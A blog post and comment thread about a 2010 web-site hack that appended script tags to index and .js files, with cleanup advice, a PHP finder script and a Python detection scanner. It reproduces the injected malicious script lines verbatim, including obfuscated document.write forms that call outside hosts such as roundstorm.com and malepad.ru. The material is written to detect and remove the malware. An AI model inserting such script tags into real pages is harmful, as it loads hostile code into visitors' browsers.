Saturday morning a couple of my sites were hacked by something I’ve not found a lot of info about. I’ll call it The Drunkjeans Hack. I’ve also found this being inserted from other domains (see below).
Some idiot has inserted a piece of code into the main index.php file that looks like this:
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--bc02f73b8cefc99fd497a0d96d646c0e-->
The first line calls a JavaScript file on the given domain, while the second line is a unique identifier (consider yourself an individual).
What this thing does is unclear, but depending on how far the hackers get with this, it could be anything from a wonky homepage to the entire site being down. I did some digging and here’s what I found out:
This thing attacks all browser default files (the files a web server serves when a directory is requested) as well as .js files. Literally ALL of them in your site, including sub directories. Browser default files are index.php, index.htm, index.html, start.htm, start.html et cetera.
In WordPress, there’s an index.php in your root and one in your theme’s directory.
There are also several .js files scattered all over the installation, including plugin and theme subdirectories, so it can be a rather lengthy search…
The good news is that the exploit does not seem to touch your database, from what I can tell.
What does it do?
The Hack attaches a piece of code that loads a JavaScript file wherever it can. What that file does is unclear (I tried to download one for closer inspection but it didn’t work). It does this either as a <script> tag or as a JavaScript document.write statement.
A good example for this is the Next Gen Gallery Plugin, which uses the Shutter Reloaded library. Here’s what I found at the end of the shutter-reloaded.js file (in wp-content/plugins/nextgen-gallery/shutter/):
document.write('<s'+'cript type="text/javascript" src="http://oldgoal.com:8080/Database.js"></scr'+'ipt>');
Why does it do that?
I think I’ve discovered the big idea now: on a shared hosting package with Strato in Germany I found some files that redirected the site to several Viagra Shops (like Superviagraonline.com – grab a bargain while it’s hot).
How can we kill it, Cap’n?
Looks like deleting the code and saving the file is doing a good job. The code is always at the end of the aforementioned files so it’s fairly easy to find – once you know which file it’s attached itself to. Use Sophos or the free version of AVG for clues.
If you want to find EVERY file on your site that’s infected, issue this server command in your home directory:
grep -r 'roundstorm.com' *
Once index.php is clean you can hand it to root and make it read-only so it can’t simply be rewritten (this needs root access):
chown root index.php
chmod 444 index.php
PHP Finder Script
I figured that many of us don’t have the liberty of shell access, so I’ve devised this little PHP script that should do the hard work of finding infected files for you.
Copy the code below into a new text file, call it test.php and upload to the root directory of your site. Then call it in a browser (say by http://www.yoursite.com/test.php) and the script will get to work. This can take a few minutes – be patient.
<?php
// Search every file below the current directory for the injected domain.
$domain = 'roundstorm.com';
$cmd = "grep -r " . escapeshellarg($domain) . " *";
echo htmlspecialchars($cmd);
$output = shell_exec($cmd);
// Escape the output: the matching lines contain the injected <script> tags, and
// echoing them raw would make the browser load the very script you are hunting.
echo "<pre>" . htmlspecialchars($output) . "</pre>";
?>
Replace the “roundstorm.com” domain with whatever bug you think you have. To be 100% sure, run the script several times with all the domain variations listed below. Delete test.php from the server once you’re done: it runs a shell command for anyone who requests the URL.
Variations
So far I’ve found the following code fragments. Your site is only ever affected by one of these domains so that’s the one to search your files for.
A WHOIS lookup reveals that these domains were registered on the 7th of July 2010 in Roubaix, France via Bizcn.com (that’s a Chinese ISP and Hosting Provider).
- Drunkjeans.com
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--bc02f73b8cefc99fd497a0d96d646c0e-->
- Roundstorm.com
<script type="text/javascript" src="http://roundstorm.com:8080/Raster_Graphic.js"></script>
<!--8a4dc551741b1d10ebb7f9be14f2fd86-->
<script type="text/javascript" src="http://roundstorm.com:8080/Online.js"></script>
<!--aece678dacd5049fe548c4340509b03d-->
What’s funny about this variation is that apparently McAfee have classed this domain as SAFE… why am I not surprised?
- Tightsales.com
<script type="text/javascript" src="http://tightsales.com:8080/Gnutella.js"></script>
<!--ff2dbb7d5af9170e22a852d7c5329dd4-->
- Oldgoal.com
<script type="text/javascript" src="http://oldgoal.com:8080/Database.js"></script>
<!--c7be90541d124051804d7e894f2ca5f8-->
- Ionicclock.com
<script type="text/javascript" src="http://ionicclock.com:8080/P2P.js"></script>
<!--4af2b43758e09b79597726bfba081cdb-->
- Hugejar.com
<script type="text/javascript" src="http://hugejar.com:8080/Bandwidth.js"></script>
<!--fa1321ff9c78ec6db9352bd10fba5ee4-->
- Pantscow.ru
<script type="text/javascript" src="http://pantscow.ru:8080/Null.js"></script>
<!--4959c803f900d6a68b1b0140227118ba-->
- Malepad.ru
document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/QuickTime.js"></scr'+'ipt>');
- Galslime.com
In the WP backend, I could see something being called from galslime.com – not sure which file is compromised but I’m determined to find out.
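For those who would rather run one scan than grep once per domain, here is an added example scanner (not the finder script above and not anything from the attacked sites) that covers both fragment shapes shown in this article: the plain <script> tag with its 32-hex-digit comment, and the split document.write form found in .js files. It goes beyond the list above in that it matches any host on port 8080 and merely flags a domain as not yet known, so a new variation still shows up. Only the domain names are taken from the article; the regular expressions, the helper functions and the sample files it writes into a temporary directory are this example’s own construction.

```python
"""Added example: find (and optionally strip) the injected fragments described in
the post. Only the domain names come from the post; everything else here,
including the sample files, is constructed for this example."""
import re
import sys
import tempfile
from pathlib import Path

# Domains named in the post. The patterns below match ANY host on port 8080, so an
# unlisted variation is still reported, just flagged as not yet known.
KNOWN_DOMAINS = frozenset({
    "drunkjeans.com", "roundstorm.com", "tightsales.com", "oldgoal.com",
    "ionicclock.com", "hugejar.com", "pantscow.ru", "malepad.ru", "galslime.com",
})
SCAN_SUFFIXES = {".php", ".htm", ".html", ".js"}

# Form 1 (index.php, index.html, ...): a <script> tag loading http://host:8080/Name.js,
# usually followed by an HTML comment carrying a 32-hex-digit per-site identifier.
SCRIPT_TAG = re.compile(
    r'<script type="text/javascript" src="http://([a-z0-9.-]+):8080/[^"]+\.js">'
    r'</script>\s*(?:<!--[0-9a-f]{32}-->)?',
    re.IGNORECASE,
)
# Form 2 (.js files): document.write() with the tag split as '<s'+'cript', so a
# naive search for "<script" does not find it.
DOC_WRITE = re.compile(
    r"document\.write\('<s'\+'cript type=\"text/javascript\"\s+"
    r"src=\"http://([a-z0-9.-]+):8080/[^\"]+\.js\"></scr'\+'ipt>'\);",
    re.IGNORECASE,
)

# Constructed sample site (not real infected files): two hits in the shapes the post
# shows, one clean file, and one hit from a host the post does not list.
SAMPLE_FILES = {
    "index.php": '<?php echo "hi"; ?>\n'
                 '<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>\n'
                 '<!--bc02f73b8cefc99fd497a0d96d646c0e-->\n',
    "wp-content/shutter-reloaded.js": "function shutter() {}\n"
        "document.write('<s'+'cript type=\"text/javascript\" "
        "src=\"http://oldgoal.com:8080/Database.js\"></scr'+'ipt>');\n",
    "js/clean.js": "var x = 1;\n",
    "new.html": '<script type="text/javascript" src="http://example.invalid:8080/Foo.js"></script>\n',
}


def find_injections(text):
    """Return [(form, domain, known)] for every injected fragment found in text."""
    hits = []
    for form, pattern in (("script-tag", SCRIPT_TAG), ("document.write", DOC_WRITE)):
        for m in pattern.finditer(text):
            domain = m.group(1).lower()
            hits.append((form, domain, domain in KNOWN_DOMAINS))
    return hits


def clean_text(text):
    """Remove every matching fragment; returns (cleaned_text, number_removed)."""
    total = 0
    for pattern in (SCRIPT_TAG, DOC_WRITE):
        text, n = pattern.subn("", text)
        total += n
    if total:  # the fragment sits at the end of the file; drop the blank tail it leaves
        text = text.rstrip() + "\n"
    return text, total


def scan_tree(root, clean=False):
    """Walk root and return {relative_posix_path: hits} for every infected file.
    clean=True rewrites those files in place (take a backup first)."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        # latin-1 maps every byte 1:1, so unrelated non-ASCII content survives a rewrite.
        text = path.read_text(encoding="latin-1")
        hits = find_injections(text)
        if not hits:
            continue
        report[path.relative_to(root).as_posix()] = hits
        if clean:
            path.write_text(clean_text(text)[0], encoding="latin-1")
    return report


def write_sample_tree(root=None):
    """Write SAMPLE_FILES under root (a fresh temp dir if None); returns the root."""
    root = Path(root or tempfile.mkdtemp())
    for rel, content in SAMPLE_FILES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(content, encoding="latin-1")
    return root


if __name__ == "__main__":
    # Usage: python scan.py [site-root] [--clean]; with no root it scans the sample tree.
    args = [a for a in sys.argv[1:] if a != "--clean"]
    site = Path(args[0]) if args else write_sample_tree()
    for rel, hits in scan_tree(site, clean="--clean" in sys.argv).items():
        for form, domain, known in hits:
            print(f"{rel}: {form} -> {domain}" + ("" if known else "  (domain not in list)"))
```

Run it against the document root of the site to get a list of infected files and the domain each one calls; add --clean only after you have a backup, since stripping the fragment restores the page but does nothing about how it got there. Files that the scanner reports as a new domain are worth a closer look before you extend KNOWN_DOMAINS.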
Further Reading
Some forum posts I found about this exploit:
Did you ever find out which file they used to compromise your WP installation?
So far I know the INDEX.PHP files have been compromised – both in the WordPress directory and in the directory for the active theme.
There has to be something else though because neither of these files are called in the WordPress backend, and I can see them being loaded there too. I’ll keep digging and will report…
It looks like we had our main site hacked late Thu / early Fri 8-9/July/2010. Ours is hand crafted html hosted on a dedicated server with a UK-based ISP, so this isn’t just a WordPress issue. Hack added after closing html tag as in post: roundstorm.com:8080/Scrolling.js
Ah, thanks for letting me know. The plot thickens. Which hosting company are you with? And what OS is your server running?
I’ve experienced this with a 1and1 dedicated host in the UK (running CentOS 5 and Plesk 9.5) and also with a Hostgator shared package (don’t know what OS they run – but they use Cpanel instead of Plesk).
ISP: tsohost.co.uk, OS: some linux flavour!, uses CPanel.
We noticed it first on Fri am with problems linking. Thought it was a firewall issue initially. AVG (free version!) was the first to pick it up as a threat on an employee’s home computer.
Thanks for the tip – good old AVG, I’ll try that next. I’ll get in touch with a couple of hosting providers too and see if they know about this.
I meant to ask: what was the file called they got into? Was it index.html?
Hi Jay. Yes, it was plain old “index.html”. Other pages on the site seem ok.
Also compromised. All index.php, main.php and home.php files. Site is custom framework so no opensource CMS or anything.
CentOS 4.2
Plesk
What I also found was that it modified every single .js file and added the following at the bottom:
document.write(”);
Got into my index.htm file and as above post says, compromised my javascript files and added document.write(…roundstorm etc…) at the bottom of each of the files.
This isn’t WordPress only, my site is completely custom built.
Could you let me know if the .js files were in a subdirectory and what they were called?
I’m currently having a plough through the myriads of WordPress .js files but haven’t found anything yet.
Do any of you advertise on Facebook? I started an ad Friday (first time ever) – for a new website that has been hacked. I have never advertised with Facebook before but then (Sat./Sun) started having these problems. I was just wondering if there was any tie to the sites that advertise on Facebook?
I can’t get to any of my pages and even take the code off. All of my pages seem to have the hugejar.com code but I can’t access them.
Heidi, I’ve checked with some of my clients and none have advertised on Facebook.
I had the same thing on my website, it infected various different scripts and somehow even got in to replace and infect well protected files. It even got to some scripts that are not public. To me this suggests some kind of root level access.
I don’t know how this virus works or anything about its method or how to protect against it, but I have managed to check through 20,000 odd files and replace them with fresh copies from my backups. Mostly index.php’s, .js files and .html stuff.
Just had another site hacked with something probably related: I’ll call it the “Comber 38” Hack. I wish these attacks would stop – and I’m still clueless how people can write to a directory without having access to it.
If you know anything about how this is possible, please let us know.
Ours got hacked on July 8th as well. We are being added as a spammer and all the spam filter sites are picking it up. We are getting emails returned because our site is listed as a known spammer. Don’t know if this is related but guessing it is.
Hi Pete, I’m pretty sure this is related – I’m suffering from that as well. My good old harmless personal blog is now classed “unsafe”.
I found some instructions at StopBadware.org on how to request a review – even if it’ll take a few days at least it gets your site whitelisted again. Let me know how it works, I’m applying now too.
I would love to know how it worked too because if it got in once then it can sure as heck do it again and I doubt just changing my passwords and removing it from the web server files will work.
But I have a lot of different systems so knowing which is vulnerable requires knowing how the script works. I have tried to contact various AV firms but they are all useless.
I assume it’s some kind of injection attack (like the old SQL injections of old) that has been modified to hit HTML and JS instead of database content because my databases all seem clean, at least so far as I can tell.
However this is unlikely to let hackers write to restricted DIR’s without root access. Hmmppff
Precisely my thoughts too Mark – and just when I thought this one had passed, another attack hit me (see this article). This one doesn’t amend files, it just writes them straight into my directories – how on earth is this possible? It’s happened on several sites, each with different user name/password combinations so I bet they don’t get in via shell or FTP access.
I’ve had a look at when my files were modified (and when the new ones were placed respectively) and checked the httpd access and error logs. Nothing unusual in the access logs but shocking results in the error log: there was a grep command that was used literally on every file on one site – access was always denied though. 6 different IP addresses tried to open files and systematically “guessed” directories that lucky for me didn’t exist – among their interests is phpMyAdmin, php and the WordPress Login screen. Scary!
Yesterday I discovered OSSEC and will install that on my systems today. It’s an open source Intrusion Detection System. The guys at WordPress.com use it to monitor their servers, see if that helps. It’s supposed to cut access to IP addresses that would do what I’ve mentioned above immediately and send me an email when an attack is underway. I’ll let you know how it works.
Sadly my site is on a Managed Dedicated Server so that’s not an option but I did find some useful tools for checking website security and will give those a bash. Check this.
http://sectools.org/web-scanners.html
Great find Mike – some of those tools are also mentioned in the OSSEC book. I think a rootkit check and server rebuild is in order…
I’ve just added a PHP Finder Script to the article! With it you can find infected files via the web browser – works great for shared hosting packages
We’ve got the friggin thing too – we thought it had gotten in via mybb though?
I have my mate looking at this later – he’ll sort it!
Really upsets me to see people doing stuff to hard-working people’s websites.
Why don’t they just get a life?
I’ve just experienced the same Russian filehack on 3 different webproviders I use. One of them is surftown.dk/surftown.com and an online friend of mine noticed the same code on his webpage which ALSO is surftown.dk – and we’re on two different accounts and haven’t exchanged any form of file exchange or anything at all.
Could this be a weakness/bug in linux or php? It must be a pretty big one if a pretty big webhost-provider has let them through.
OR…it could be that both my PC and my friend’s PC are infected with the same malware thing causing the code addition whenever we contact the ftp server. It’s really a mystery…
I’ve fallen foul of the pantscow.ru version. Had 2 sites hacked. Both on the same physical server but via different hosting accounts (one direct, one reseller with the same hosting company). Both use cpanel.
Reported it to my webhost and they said that there was suspicious FTP activity shortly before I first noticed the site was down / hacked. They think the hackers may have gained access to my FTP passwords. Possible I suppose since I was “between” Norton 360 and ESET. ESET wasn’t working as Windows updates had casually omitted to update me to Vista SPs 1 & 2 and … I’ll spare you the saga.
Alternatively, it might be a cpanel vulnerability?
Looks like there are so many of us infected by this thing. Various hosts, various configurations. I don’t think it’s cpanel; I’m running Plesk and had the same thing happen. Those panels only control aspects of the LAMP servers – but it could well be an Apache exploit.
I’ve just changed all my FTP passwords to some ridiculous code strings that nobody can remember. It’s now 48 hours later and the hack hasn’t come back – so maybe they did get in via FTP. Before it took them a couple of hours to hack in again. I’ll keep you posted if it does though.
Thank you for all your comments – it makes a big difference to know that we’re not alone
Do any of you guys use FILEZILLA?
We think that’s what it’s using to get passwords (they are saved in plain text in a file on your PC)
And we do believe it’s all happening via FTP.
Yes I use Filezilla… and I also believe it’s happening via FTP. Since I’ve changed all the FTP passwords, the files are OK (although a certain IP address has tried to gain access into EVERY account).
Superb call Olly, that may well be how they got their hands on the passwords: FileZilla.
Hands up everybody who has their site hacked AND uses FileZilla.
http://forum.filezilla-project.org/viewtopic.php?f=1&t=11003&start=0
FYI
A search for filezilla, password, hack finds LOTS of stuff about it.
We had 3 accounts hacked on our server, however we can’t work out how these three particular accounts got owned.
I have filezilla on mine, and that could explain 2 of them, but the other 1 is a mystery.
My mate uses filezilla, but only has HIS account saved.
The only explanation is that we both had/have a virus.
I’m scanning every computer in the office with Malwarebytes.. Not found anything on mine yet tho!
Also hacked. We had the malepad.ru in all our js files. We don’t use filezilla. Since the DB’s seem unaffected and based on comments above I’m leaning towards FTP breach. Obviously we’ve changed all the FTP passwords. Off to fix all the js files now….
@ Jeremy
What a pain… Good luck
@Alex79
Sounds serious. See if you can get in touch with your hosting provider. If they can’t help you, sign up with me and get excellent hosting with Wordpress pre-installed.
MY SITE HAS BEEN hacked by * Malepad.ru
document.write(”)
I CLEAN THE FILES, IT WORKS SOME TIME BUT NOW I CAN’T LOG IN TO MY WORDPRESS CONTROL PANEL, IT GIVES ERROR 500 INTERNAL SERVER ERROR AND MY SITE GIVES ERROR 500 INTERNAL SERVER ERROR ..I DELETE EVERYTHING, DATABASE, EVERYTHING..BUT I CAN’T INSTALL A NEW FRESH WORDPRESS ..IT GIVES ME 500 INTERNAL SERVER ERROR!!
PLEASE HELP
Same problem as above, several sites got infected and I use CentOS, Cpanel and FileZilla.
I think we had a similar problem about 6/7 months ago where all our index files got infected. But since then I have moved to a new server but with the same company.
we got it pretty bad
inkrainbow.ru/quicktime.js
pocketbloke.ru/QuickTime.js
Search ".ru" (4255 hits in 1298 files)
not all of them are the address but most are
Same here. They “hacked” our website I think through ftp and installed the above code. The url of the javascript doesn’t exist and the funny thing is that google got it just before I could do something. (I found it straight away)
Now I changed ftp password and changed also the infected files. (mostly .js files) and just one php file.